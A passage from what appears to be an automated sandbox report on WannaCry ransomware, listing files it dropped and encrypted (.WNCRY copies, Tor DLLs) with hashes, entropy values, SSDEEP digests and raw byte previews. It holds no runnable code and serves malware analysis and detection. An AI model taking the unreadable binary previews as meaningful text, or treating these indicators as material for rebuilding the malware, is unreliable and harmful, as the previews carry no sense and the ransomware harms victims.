Preview:	WANACRY!......vS.;...}G.......].S1=...?...nA...6]m.+..=.W........+.h..`......E<]....T.....U..%..?3L_........x..%..Z9.....E.kZ..&.C......A....Od....0k.".:"...-`.WR..).B..@..zX......A.Q<g.y..@..\|..<H.....f......L..\=5.v.0.HP.-s..7.O..j.F.Y.\...U...V'(...k..............."..$lH.n.f.#F....'...2.....rLF.>.(......XI....6!PQ...`......f..K..Q...p......^3..... ..A.a.)...U.....\ck....y...J...9........q....2....QHK.[q.B}..'..rG..~..v.8.....Ref..)`.. .zApP...`5.e.....H...'.h..H"YR6h.@......s....../.Tk.6-... .=\ZLw..?.e.\|..Ig[m..L..g../`...3)..x..E....'._U..C...50......W...t5.JUM;...`...~..\.Ue!lb.."...."'........o...h.a...c.2rqF.S.....KE..M.?z...w......OH......}H.b....=I+........n[...(.DLGur.....3.....;......D..6....<...,i.%..t.&@<.E.TE.......c........l..q.E...u.:....w._..L..u...GCu.....R.\...$.,......6...4w.G.Y9{.."t.%...UK.._.....\|\|......&.....Q;r..A@..1/G.$?..OY.......WxW.."I..9..-.....P...2.d+.g.{d.....{...z;3`.a..7E...<...i.&

C:\Users\user\Desktop\QCOILOQIKC.mp3

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.805221957445608
Encrypted:	false
SSDEEP:	24:lURGYGuKYpAXT8tApbFNk9z6NFcI0icpI9QZlhFHhe:1+eXTHPk9IcIRcyElk
MD5:	3B9A44CC2C3855530AC3A8C92396B5B6
SHA1:	FC5740F8BDB38CFEA5B88888EE5EBBDCB5EA8A84
SHA-256:	625924161F4678A65740525F66B17E7B06D864F22F7802DAC3F0FFA99329C8D6
SHA-512:	DDF50623EA8BE2F2F0C1C6CD7CC6397B1D25CD0864045ADCC5661707AE4334C83F084A55E3F41D93DC72A31B17FC2810DA7D3576473042F0F4CF6A4C1D131533
Malicious:	false
Reputation:	unknown
Preview:	a.n.J`....y...`.N.+.Qk.H.R....4....1.(v...~F..b...G .=.....V0.}#..M!)....&[W.A<....fxt7....v.......eJ.<6.m.c8o.<..d3}'.k.....~..?...m8..\.P.y.S.._Y.q..A.S?....=.].)........T...F...G.;~..f)2.R...`.IA...{.o.d1g{..}~....n[.....u`i.MC4..wD^fs._........R...$..U...J...{nwO....!.X.....&...H....a..).]cx.c..g.ff[.?..9j...C..."......i....n..%b~..]LIV..Q..A..E...+...w..f.Ci.G!Jj....I.....wP.@..g..9....}.rb.L.E......+I.H....+......r.3..&`...Sr.K....R..9.$")1[....u.^..Y.m....s...N..[(sL..Ui..;4.......g.+.5.....1F9..).......j...;`8Q<#.(.!.....'=lLP...-#x.U...@....Vw. fp.0.................g3.c^.%...".lz...g.%}.U).M......l]+V.M...)Q..y.,=...W....e..e..p^HXT....Ju...<......?&}5.h...}...(.k..$y.8.v-..).*.z.;..xb..G.D.h .Zv...G;..\.~.vF.5.l.G..S-&.>...dD...l..3...x2...P.y......,.,I..\|W../.%%!.fy.5D%e.[....p.....Z.....x....l.E....Fe...J.3'J.&^....{.e...VU....:...%..J..:j;f....(9..qJ5.$.......&K+.../.1..u?#...e)C....3.$~lp..!..`.\+..o..}9...

C:\Users\user\Desktop\QCOILOQIKC.mp3.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.844217520633216
Encrypted:	false
SSDEEP:	24:bkU6toSN8eCFAjmUnNpe7/KmOBna4oRmXlPwhRl2zUuldwwnn17SkQb9TCZ0fUZD:bkU6oEaFAjmUnHEOBajmVPw7leUSdFnh
MD5:	834B38DD6BE2A6F1AEA24CEBFA7B78C7
SHA1:	2B6C2C7DDA822A96606103DD23B9E51D34E59900
SHA-256:	CDF680EC11E16F29F324B0B74C95C4412A280D958D9DFA3D223FAF2334A84B54
SHA-512:	072E90D7346E79B001AC964ECBA45CB1CF3B5B7C57E12A41384A4B2F2DDDD8CF97A7055CE45229BD540C4C0F270CF66F262E0B5AA4E7C070E690067003975649
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....:...p..~.u.a#.l...../.l.(i.8.....!....CwGO.'z.e.l5o.....lX^..@......@.<@i+..,...=c8!j\f[e.....:...z.;.0..&.ch...L..U\.I.\9..]....!.Uu...cF&.`.m.z&....A..V]5..fL.O....W..M..&.j......6..MY..3...])....s....J.yQ0.[;...?h.N.@.......P.Y4..................P.(u$...f .-#9....".l..........U_...b.B.SV.?.jZ.h5d......8S.`U..%.oB..{p.pL.....+.+..9@b.+....s/.....)@..t.....S.....l'....PT.B....+..v..1.e^6.s....5..6.m['..pI..(..c....'..R ..b.O.V.VF\|rH..t...B....3.d..f.kL....W....wt=MhcO..-.e..g.}...HK.....3. ..2..q.)`.s...N.fd.O........}e...yI.D...I..r.....6...FX....h..x..qm.o..^N~Rq..v&{w7.ChMi......9g.t.B...et...Cc]...G....T.*..1..0.o..N...C....f.\t.\|.d....!@..X.....s.,.....F..L-..)...8#. .T/6=/[.T.}W.+?.\@65D...f.sr........n\{..F(.=...b..,&...Vd.7!&v.&......p+ ...B4..e....oIM..G..#A}Ps..ID../3...VO~y...}..5].+....x_....=..........p....^....54.lj...F.w'........oP[\(5g.cb.~....=..)J........X.`^.7:...K.Hvb..-.F..$.:=..$.vX.?F.P...U

C:\Users\user\Desktop\QCOILOQIKC.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.844217520633216
Encrypted:	false
SSDEEP:	24:bkU6toSN8eCFAjmUnNpe7/KmOBna4oRmXlPwhRl2zUuldwwnn17SkQb9TCZ0fUZD:bkU6oEaFAjmUnHEOBajmVPw7leUSdFnh
MD5:	834B38DD6BE2A6F1AEA24CEBFA7B78C7
SHA1:	2B6C2C7DDA822A96606103DD23B9E51D34E59900
SHA-256:	CDF680EC11E16F29F324B0B74C95C4412A280D958D9DFA3D223FAF2334A84B54
SHA-512:	072E90D7346E79B001AC964ECBA45CB1CF3B5B7C57E12A41384A4B2F2DDDD8CF97A7055CE45229BD540C4C0F270CF66F262E0B5AA4E7C070E690067003975649
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....:...p..~.u.a#.l...../.l.(i.8.....!....CwGO.'z.e.l5o.....lX^..@......@.<@i+..,...=c8!j\f[e.....:...z.;.0..&.ch...L..U\.I.\9..]....!.Uu...cF&.`.m.z&....A..V]5..fL.O....W..M..&.j......6..MY..3...])....s....J.yQ0.[;...?h.N.@.......P.Y4..................P.(u$...f .-#9....".l..........U_...b.B.SV.?.jZ.h5d......8S.`U..%.oB..{p.pL.....+.+..9@b.+....s/.....)@..t.....S.....l'....PT.B....+..v..1.e^6.s....5..6.m['..pI..(..c....'..R ..b.O.V.VF\|rH..t...B....3.d..f.kL....W....wt=MhcO..-.e..g.}...HK.....3. ..2..q.)`.s...N.fd.O........}e...yI.D...I..r.....6...FX....h..x..qm.o..^N~Rq..v&{w7.ChMi......9g.t.B...et...Cc]...G....T.*..1..0.o..N...C....f.\t.\|.d....!@..X.....s.,.....F..L-..)...8#. .T/6=/[.T.}W.+?.\@65D...f.sr........n\{..F(.=...b..,&...Vd.7!&v.&......p+ ...B4..e....oIM..G..#A}Ps..ID../3...VO~y...}..5].+....x_....=..........p....^....54.lj...F.w'........oP[\(5g.cb.~....=..)J........X.`^.7:...K.Hvb..-.F..$.:=..$.vX.?F.P...U

C:\Users\user\Desktop\QCOILOQIKC.pdf

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.801204761909629
Encrypted:	false
SSDEEP:	24:23tbtGZsSXYSfB1E404fgU8xUTOyqNZ1cR6jVk:kAsSIAB1EIfNdOj+Ck
MD5:	72EC6A04100027C0035995D660A56386
SHA1:	C6BF69E2FDF68E43BEE37ED9B3719C6C61DFB55B
SHA-256:	3B5F759D3A5A6DEE44237B0248FF75500905471FDD5B18C41430F98A17D062C0
SHA-512:	9F18ED83BF0F24D96B54E77A36AA8A4CC7D454981BB23FA3E7C3AFB0127EB95550F04130397A2D94E6EFBEDCD31331C2288D4602E97784D2F6C25E1800CDB63E
Malicious:	false
Reputation:	unknown
Preview:	...........'....Kue&..<..%.....2........M....K.N...x7.B.G^.F.1I..n.[.e....-.e.Y.B..../.2.GD...q3....o.I...A...^p#..].}.(uw9e.Fx.O.+..`.....D......3.S.o..:.^.OT..3.......Q..p...)m.ZB.Z.2d.RA....!..k...k.U.20.c...>nk.3Xw.>.P &eYP......U.Y..&:..n...D...m(LS3....r[.6(.n.....I....P..@..9:z.6..n....4]p.N.....`..PW../."sP.\|.`.....R......{.a..6z.K.w..W0......b&....H@LbV....}7..O 81.....)...!J#....._.q.mJ#.JSC.....+8.D.........F....{..$.2...?Q..(..ht...eZM.. ).$..4.'......7..~.8....O../...,a..i....p..qC.u.<.\|...3....C,lit........h.x.i9.,9v...I....O...+.. .:c ..P6..,.....a..s...7oB.........?Z.N..M..P..9.,.Y.).`..J....2..p...12z o.\|..7....0...........Op{A.M...r.#..Z.xo....0J.s.JS..Z`.]:...F....e..R.A.f.6.\|eo....K.z=7w.L.Zw..z]Y......P..........b.].._..r...Lb.2.47._..9rI0<....87.....\|o..C)...."...'w.W:.:.....N....v.V.9.Z#........Q..=..".+\|4.PA7U*R.G ..v..g0.j\.`H.....Jy.G..j..s...}...M.LWV.Tk.@y.n.$..o.....F..@..............5.^$;)....u.R...`v...z....W

C:\Users\user\Desktop\QCOILOQIKC.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.84474602568448
Encrypted:	false
SSDEEP:	24:bkEGpfQueMma0ywI87rRoaCArHrhO0ajer/aJwCtM3PNre/pZzp9ImqfDRLT7n:bkRfv0yN87rrCmNO07r/adSMz3QR7n
MD5:	E3F45447D639211DBE8EE6E186BB41DD
SHA1:	8687793067B3E89076075BBABBABA22E344338A6
SHA-256:	72DC176E2B4F347B038E7B418A6E86254F4370B0D18E413C2495EE31A3CCF2F8
SHA-512:	360A3EFCB671343D69FABCB91E995DAD6387A5018FEDD6868AA7536029B4769BF6981005E6C16EEE2329A83AF6E254DDA5AD1AFF8F9D53352E11CB2783C7B36F
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....L.C..a.'<.Q.17...[..R..z..pm.. .=.6d.}.#p.W.8.8...{..]......).".7o..~.c....4..w.P.{.d.xNc~%...F....>..bn..v"]. JO\|..r......5..........7>~....&..~.crYM...E..~....R..1F.F$Ai<.5.fx.+.......`...t.~.Y.[: .xW.2.':_.p.I....+.G$....k..3.....W+w..D3.............3..Z..+.6..i.;.d.B'...`..sL9T%W.zmjJ....BX....N.?.D.U.&H.....t.[.=......tS.....X%.?~..cK..L$..A..d{k}Y.......J.v...YtF.i....p.._.......v..Z..K.K.r..."...6.y....[.....y.6..v..W.!,.Z.T..}........5L...&..X......lcp....D..<x?W..-.h..4FZ.w..(...%B..5....Zq..1.d....4W...w.`....m.@q9.4....6.\p..%......t...D.....c.]...0.@.....OU......?0..N.P....]^.?.C........v..o._.K.._7\....7..D.....(.#.z..O..!...s..X...{.KE.bsa....'......+N........lv........,.)........@o#.$W.=..xp.L....}!,....U..EF...u.E..u.B?.Ci..\|....u..?..H&..{.An...8.Zb\..$v.).Q.Z@.D&/.f.(...W0....P.]K...qQg......W.\|d:k.?.v.z8....?.o.....5.a>.Dokt........$Y.:E.:..{.(7.M.].R.M......h..q...X..c.1'*Mg.#...pR.....L...

C:\Users\user\Desktop\QCOILOQIKC.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.84474602568448
Encrypted:	false
SSDEEP:	24:bkEGpfQueMma0ywI87rRoaCArHrhO0ajer/aJwCtM3PNre/pZzp9ImqfDRLT7n:bkRfv0yN87rrCmNO07r/adSMz3QR7n
MD5:	E3F45447D639211DBE8EE6E186BB41DD
SHA1:	8687793067B3E89076075BBABBABA22E344338A6
SHA-256:	72DC176E2B4F347B038E7B418A6E86254F4370B0D18E413C2495EE31A3CCF2F8
SHA-512:	360A3EFCB671343D69FABCB91E995DAD6387A5018FEDD6868AA7536029B4769BF6981005E6C16EEE2329A83AF6E254DDA5AD1AFF8F9D53352E11CB2783C7B36F
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....L.C..a.'<.Q.17...[..R..z..pm.. .=.6d.}.#p.W.8.8...{..]......).".7o..~.c....4..w.P.{.d.xNc~%...F....>..bn..v"]. JO\|..r......5..........7>~....&..~.crYM...E..~....R..1F.F$Ai<.5.fx.+.......`...t.~.Y.[: .xW.2.':_.p.I....+.G$....k..3.....W+w..D3.............3..Z..+.6..i.;.d.B'...`..sL9T%W.zmjJ....BX....N.?.D.U.&H.....t.[.=......tS.....X%.?~..cK..L$..A..d{k}Y.......J.v...YtF.i....p.._.......v..Z..K.K.r..."...6.y....[.....y.6..v..W.!,.Z.T..}........5L...&..X......lcp....D..<x?W..-.h..4FZ.w..(...%B..5....Zq..1.d....4W...w.`....m.@q9.4....6.\p..%......t...D.....c.]...0.@.....OU......?0..N.P....]^.?.C........v..o._.K.._7\....7..D.....(.#.z..O..!...s..X...{.KE.bsa....'......+N........lv........,.)........@o#.$W.=..xp.L....}!,....U..EF...u.E..u.B?.Ci..\|....u..?..H&..{.An...8.Zb\..$v.).Q.Z@.D&/.f.(...W0....P.]K...qQg......W.\|d:k.?.v.z8....?.o.....5.a>.Dokt........$Y.:E.:..{.(7.M.].R.M......h..q...X..c.1'*Mg.#...pR.....L...

C:\Users\user\Desktop\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.828121638741726
Encrypted:	false
SSDEEP:	24:ku4GEg2Up1vNc39xMaCOjiAqVXcAwKvHO4rGyeA/zw4+Q:ku4ZgTgMZciAA5wKGEGyNw4t
MD5:	5A87B1EC5868EB417108121F18E582C2
SHA1:	71AFCF6DB75C4537F7A2EABC77AE95516C12175E
SHA-256:	1FC888FFA3E13C89DB7662864F0A90C17A9D450D508E6D748EFD7133FBC92842
SHA-512:	45F31377B17306AAC9EF33706E9A160E07EC99C903297133EE802CBB0BA4275E2087262C227D236330D539936A60908B7BF35D13FB03DCFD3E7902B8709F40C0
Malicious:	false
Reputation:	unknown
Preview:	..[.q..c.H$...t.bA1...^...8'..8.\|.^.Qz.E.li....j........Suu..y.{R.d..n.. ..F...4..!....u.....Z:.i...HRW.D..9t`.B.......Ag........dc:W@..?..b.....4............I.&.....^..].P/.....Z>.h.......\.].02".O.%`.Bg....^..N..G>..RBl....;k.&g\|B.!....p.]p!.TX...b.vhn>.....dq[...C....f1R.0..a.....r....A......~0.....:D..Z..E05.$.[]..=..}..._S.Q....Fu..G.c.8.R..+....D.7.Y.J.y..N..i.(........u<i...'......3F'.0.zr.J....2...v>J...rY.L#..@N..Z.... :.....>m.-....Vv.3JEbJ..5.Xq...-..!`x....Y.WX9.MM&Fv.+."C..v.b....b...oE...Vd..i.......:8B......)...s..x,.#.......v0m.):...D..L.j...{...m...U......f.sP.9..F......S..].D.#....{W.@TL..sY....X.....>..n........D...D......~.]#.u.......G+}.CBE..S8j.%(6T.m@5.:..R..k....^9).A.1.....[.s..a."B....Q.0{.G......V....'.....+..<....6v.[..S.c.......n..0........x....-..4...).G.....E.GgA...s.2Ou.jy~...e.i..........]..g..G.bl....Z. ....P;.DNf.G.95R......d]..\...d..........!.i.tU[B.Z&...p8h..uV&F..SE..........:.r.-...3...

C:\Users\user\Desktop\TQDFJHPUIU.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.83062829876531
Encrypted:	false
SSDEEP:	24:bkHWZx5clmpaHouS/g+V9ibWxFWmkMTxcivisFF3UJ+NUq2:bkHWZcYpao3o+K5ivi8WJ+mq2
MD5:	86E44EBAE90E924FD391B9D5E1AC7372
SHA1:	67D62917A405814A7BCC6939DE96F8951B950BD4
SHA-256:	2957B12BDA3F1F0FE0E07E1726709A46EFA6C5F4CD6B8E1C6CF19F0AAA9CD6FD
SHA-512:	E57D469F1B15975B9DC16737E477180F934C18734BA04CCA707A22B39381311CA2C2AC6A9C8938C92FF46868080DA30CE3F634BFF754A588ACD2E8DEAB6D7FD9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....!..d.bLg....{.=...X.\|RT...7E. .S.$.....#....P~^.Z..6.........O...u.....D.[...tB.#..y.r....c.j....L.u.vV...>+}...a.4.H.aa.w..[.$b.1\|.....Y...q..Y...<'..C...D......{..^[..n....0..,.AR"...^.K,.V..........A....~..H......X....=(...z.P+0@K.......q............:3.+v'......o.9.B...,........M.^..U#...8.O,....6.."B..~~..a.T.8.?.3...(...\.R.)..H...E.u`.....f.2D...5...n.f....c:{;...o...h6.88.....'.&.t_....:\|..TB.Gi.n&M..3.p...'..^..c.`..\..X.d...X.I...=...L.1Xxj8.}.?/E9.3~J......D.\8Ou..q..]..........w.Vi.8....H.m)..d...Y..........GH..(...m..[.&.V....o'.\S:.Z..D...a.!....F.g0....%...5.$....;..R.d..].mSF%..O.J-.1.%..5....9^..........".Tm...-.....d../..A.....@..../..../......T@.....Y.I.,Z...d.R@.a....&w...0..H>......g..p.d...~.k.q.`.f.z. .^.....-...=3.."..\._Z..y..nW....$.?.]..{.@z.>...V..S..~....Ki8C..B.......c-.]j.<".}....]~55M.GX.FW...q.X0....'^.......G....r7...v...1K....!..2...BOTT...,h..Wc'...M1..O%....FX..t2..?.V..*....\|$k...P......M@

C:\Users\user\Desktop\TQDFJHPUIU.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.83062829876531
Encrypted:	false
SSDEEP:	24:bkHWZx5clmpaHouS/g+V9ibWxFWmkMTxcivisFF3UJ+NUq2:bkHWZcYpao3o+K5ivi8WJ+mq2
MD5:	86E44EBAE90E924FD391B9D5E1AC7372
SHA1:	67D62917A405814A7BCC6939DE96F8951B950BD4
SHA-256:	2957B12BDA3F1F0FE0E07E1726709A46EFA6C5F4CD6B8E1C6CF19F0AAA9CD6FD
SHA-512:	E57D469F1B15975B9DC16737E477180F934C18734BA04CCA707A22B39381311CA2C2AC6A9C8938C92FF46868080DA30CE3F634BFF754A588ACD2E8DEAB6D7FD9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....!..d.bLg....{.=...X.\|RT...7E. .S.$.....#....P~^.Z..6.........O...u.....D.[...tB.#..y.r....c.j....L.u.vV...>+}...a.4.H.aa.w..[.$b.1\|.....Y...q..Y...<'..C...D......{..^[..n....0..,.AR"...^.K,.V..........A....~..H......X....=(...z.P+0@K.......q............:3.+v'......o.9.B...,........M.^..U#...8.O,....6.."B..~~..a.T.8.?.3...(...\.R.)..H...E.u`.....f.2D...5...n.f....c:{;...o...h6.88.....'.&.t_....:\|..TB.Gi.n&M..3.p...'..^..c.`..\..X.d...X.I...=...L.1Xxj8.}.?/E9.3~J......D.\8Ou..q..]..........w.Vi.8....H.m)..d...Y..........GH..(...m..[.&.V....o'.\S:.Z..D...a.!....F.g0....%...5.$....;..R.d..].mSF%..O.J-.1.%..5....9^..........".Tm...-.....d../..A.....@..../..../......T@.....Y.I.,Z...d.R@.a....&w...0..H>......g..p.d...~.k.q.`.f.z. .^.....-...=3.."..\._Z..y..nW....$.?.]..{.@z.>...V..S..~....Ki8C..B.......c-.]j.<".}....]~55M.GX.FW...q.X0....'^.......G....r7...v...1K....!..2...BOTT...,h..Wc'...M1..O%....FX..t2..?.V..*....\|$k...P......M@

C:\Users\user\Desktop\TQDFJHPUIU.xlsx

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.826677545698554
Encrypted:	false
SSDEEP:	24:UPtj3sSYK4NcEiGQ8LxBLa0xF2PJ5USQ0XY5H06FEt6pN:qV3NEvQ8lBLaiI/USfsH06UQ
MD5:	A649C1D022788AA9612ED6A5527B3EBA
SHA1:	D3771ED34FB56FB13C9F7CC10B1B1E07651D2411
SHA-256:	20194FDCAB74A145364B88C26994375D0B18287730EC2CB9FA61F838CE04EA8B
SHA-512:	BCE3A6CE340715D6128C0FF786A2AE037293D9A2BCACD67648F55D59B65747E51435B8F964971AE7FA3AF221405C3C1B0960D384B5C62A40634E9A4EF7360DD8
Malicious:	false
Reputation:	unknown
Preview:	..v.m.u..Kd.o....P..r/4....&...Y.\?h......?.2..g.......?t.>D......r\.....[2cX$A.......d2M".:x......O..IN.Q.....xt.H.....)/lv.....I.W#.e....F..n.....9^x........t4.{...R..(.0qt...f..O.'.>..-tDb..-.\|.$g..0.6..uW...PYm..."..m.B.V...v.wN..-E.@"...jh-."h..Wkrs.....)..NC.\|....]B......v..\|................ ......v.P.....C.....*.-.Q]G^...oxw._..Rj..('.>....&..x.......r....<.5..Zq.N.tI......X.-...7..{..F.#..1......Y..#(}.j....L....3....j4.X..:......@.....y.R...I.1...e........i.`_.1Wc...HZ.?..<.)s,y8..!....~.%.Y..mV..8.$.!5...!...g..Y$F;.pY.^0b.yt.$....A..C......w.h...\|...=.Z!...k..`.8P...3;.....{.....RBF\|}~...3..1?...I....`..;8<v.\.[.0c...%a.y.......2...G.k~.......Vu..._r.~.c............0+.E^.p#....l...>%..-..w.......V........6@....2'.=....Z.....b2dG8=$v&.$..u_.2..#......m...F...\|DI..Qj.~.D ...h.A...-.\...f.'Z..".^J.P.j.(^......$B....`...hkT.TG.X...ec.v..^w..#.!.5......iKrQ.c...\;..f.......y..>.^\|....q..S.n.R.._..rF..&Jnh..F...

C:\Users\user\Desktop\TQDFJHPUIU.xlsx.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.847346685919133
Encrypted:	false
SSDEEP:	24:bkX0armH+yAt0mZcjX8RoIYyB2WpINlBY9blQ5DNeTvr4zjxA3wtqxDpOpoWoa:bkX0aSeyje/YyB2WpImyfJ+AIppWv
MD5:	3DF65054D0DBF2372E614099542BB2C8
SHA1:	945F4A8844F9FEC88FEB75B75FB35583EDC1A090
SHA-256:	DF54872896227DEAB9A6EB2DC7E58A6DC150F3218626D72C85080DC8B5A9FDBD
SHA-512:	5C69649BEDD4A4C171936E2708E5627CE27C43C69002A7974B76DEF297B10C8E8313358B8D3FF4577A9964B720DA4FBBEE04446D563AC74A48174D4DC0E39B8C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......x....I(.+Z.5..aC%..1..;).;V...s...\6../.>mr.:..3.....}.&g.Z..1Oc.P`.....-..)........8.....}....Ssq............hP...i.....W.a.J3..+..$.N...B.7.....u..J~..UCo.z..:..ErEJ..T.G+....S...9.4..{OC4.......C&...S.......jZ.X.....bcG.(h.\|.<.Gz...w...................m..!)......2.a.a......k..n...^-.\|....}}8?.....Z..c.W....S.{\|.....vRK.{..-.. F...iCO#...(.....1(..N...tG...<....T.zk.K..>.]..;Y.yYQ..i.I7F.&..WA..G.K..$Y...".@ .Z..k=XS..@..8;..42.3....;+...R...&.mUL;1..vD....O.'B..f.].B.E."...?..;.A.D........b.G.o.0.-.XG.>...SRw.....].....^3`.w..g...=.O..Xx.6.H......^,.........a..n...m.e....P<c.vCs4..){.-_.....Oj.!>.q9....p..8.k..aZ...F.&..'...k,.`.K..3,...i..!:V..f\|.......5`.Jw./l.]..k...dq8f.......7...:.Sz=.=.....y..$HM.3j.ex.........V.B<pl.j..R...mB......;%x..p.SN .E!.."$R3q.3.z.4>....,.?.#v.....@.....{....V..q.Gpp....GW...xJ.Ne<..r..x<a...W.u.D...d~..B..C.........b....k.xM...{...lI'.qVH.I&r....A......q...bs......B..~.{%...9......

C:\Users\user\Desktop\TQDFJHPUIU.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.847346685919133
Encrypted:	false
SSDEEP:	24:bkX0armH+yAt0mZcjX8RoIYyB2WpINlBY9blQ5DNeTvr4zjxA3wtqxDpOpoWoa:bkX0aSeyje/YyB2WpImyfJ+AIppWv
MD5:	3DF65054D0DBF2372E614099542BB2C8
SHA1:	945F4A8844F9FEC88FEB75B75FB35583EDC1A090
SHA-256:	DF54872896227DEAB9A6EB2DC7E58A6DC150F3218626D72C85080DC8B5A9FDBD
SHA-512:	5C69649BEDD4A4C171936E2708E5627CE27C43C69002A7974B76DEF297B10C8E8313358B8D3FF4577A9964B720DA4FBBEE04446D563AC74A48174D4DC0E39B8C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......x....I(.+Z.5..aC%..1..;).;V...s...\6../.>mr.:..3.....}.&g.Z..1Oc.P`.....-..)........8.....}....Ssq............hP...i.....W.a.J3..+..$.N...B.7.....u..J~..UCo.z..:..ErEJ..T.G+....S...9.4..{OC4.......C&...S.......jZ.X.....bcG.(h.\|.<.Gz...w...................m..!)......2.a.a......k..n...^-.\|....}}8?.....Z..c.W....S.{\|.....vRK.{..-.. F...iCO#...(.....1(..N...tG...<....T.zk.K..>.]..;Y.yYQ..i.I7F.&..WA..G.K..$Y...".@ .Z..k=XS..@..8;..42.3....;+...R...&.mUL;1..vD....O.'B..f.].B.E."...?..;.A.D........b.G.o.0.-.XG.>...SRw.....].....^3`.w..g...=.O..Xx.6.H......^,.........a..n...m.e....P<c.vCs4..){.-_.....Oj.!>.q9....p..8.k..aZ...F.&..'...k,.`.K..3,...i..!:V..f\|.......5`.Jw./l.]..k...dq8f.......7...:.Sz=.=.....y..$HM.3j.ex.........V.B<pl.j..R...mB......;%x..p.SN .E!.."$R3q.3.z.4>....,.?.#v.....@.....{....V..q.Gpp....GW...xJ.Ne<..r..x<a...W.u.D...d~..B..C.........b....k.xM...{...lI'.qVH.I&r....A......q...bs......B..~.{%...9......

C:\Users\user\Desktop\TaskData\Tor\libeay32.dll

Download File

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3197106
Entropy (8bit):	6.130063064844696
Encrypted:	false
SSDEEP:	98304:W5FYc9YouOquJVqrR1LlZRUT83DlJrqd+kq:WrjYouOquJgrlZ283xFqdq
MD5:	6ED47014C3BB259874D673FB3EAEDC85
SHA1:	C9B29BA7E8A97729C46143CC59332D7A7E9C1AD8
SHA-256:	58BE53D5012B3F45C1CA6F4897BECE4773EFBE1CCBF0BE460061C183EE14CA19
SHA-512:	3BC462D21BC762F6EEC3D23BB57E2BAF532807AB8B46FAB1FE38A841E5FDE81ED446E5305A78AD0D513D85419E6EC8C4B54985DA1D6B198ACB793230AEECD93E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......... ........!.....J... ..0...........`.....c..........................!.......0...@... .........................A....`..\.......<.......................h...................................................4c...............................text....H.......J..................`.p`.data...\d...`...f...P..............@.`..rdata..............................@.`@.bss.........p........................`..edata..A............V..............@.0@.idata..\....`......................@.0..CRT....,...........................@.0..tls.... ............ ..............@.0..rsrc...<............"..............@.0..reloc..h............(..............@.0B/4............ ......& .............@.@B/19.....;z.... ..\|...( .............@..B/31.....`....@!....... .............@..B/45.....'....`!....... .............@..B/57...........!....... .............@.0B/70.....".....!....... .

C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll

Download File

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	719217
Entropy (8bit):	5.981438230537172
Encrypted:	false
SSDEEP:	6144:Ir2r5rFriGKbgai112Yq/5hcQTcGzAHzSHeqoftOEEdD4B2pihSpKOKm:naiV25uQTcGzAHOEW+Pzm
MD5:	90F50A285EFA5DD9C7FDDCE786BDEF25
SHA1:	54213DA21542E11D656BB65DB724105AFE8BE688
SHA-256:	77A250E81FDAF9A075B1244A9434C30BF449012C9B647B265FA81A7B0DB2513F
SHA-512:	746422BE51031CFA44DD9A6F3569306C34BBE8ABF9D2BD1DF139D9C938D0CBA095C0E05222FD08C8B6DEAEBEF5D3F87569B08FB3261A2D123D983517FB9F43AE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t.........!.....@...................P.....e......................... ............@... ......................P..4H......................................t+.....................................................4............................text...T?.......@..................`.P`.data........P.......F..............@.`..rdata.. ....`.......J..............@.`@.bss.........0........................`..edata..4H...P...J..................@.0@.idata...............X..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..t+.......,...l..............@.0B/4..................................@.@B/19.................................@..B/31......(..........\|..............@..B/45.....1... ...,..................@..B/57..........P......................@.0B/70.....v....p......................@..B/81....................

C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll

Download File

Process:	C:\Users\user\Desktop\@WanaDecryptor@.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	417759
Entropy (8bit):	5.853358941151938
Encrypted:	false
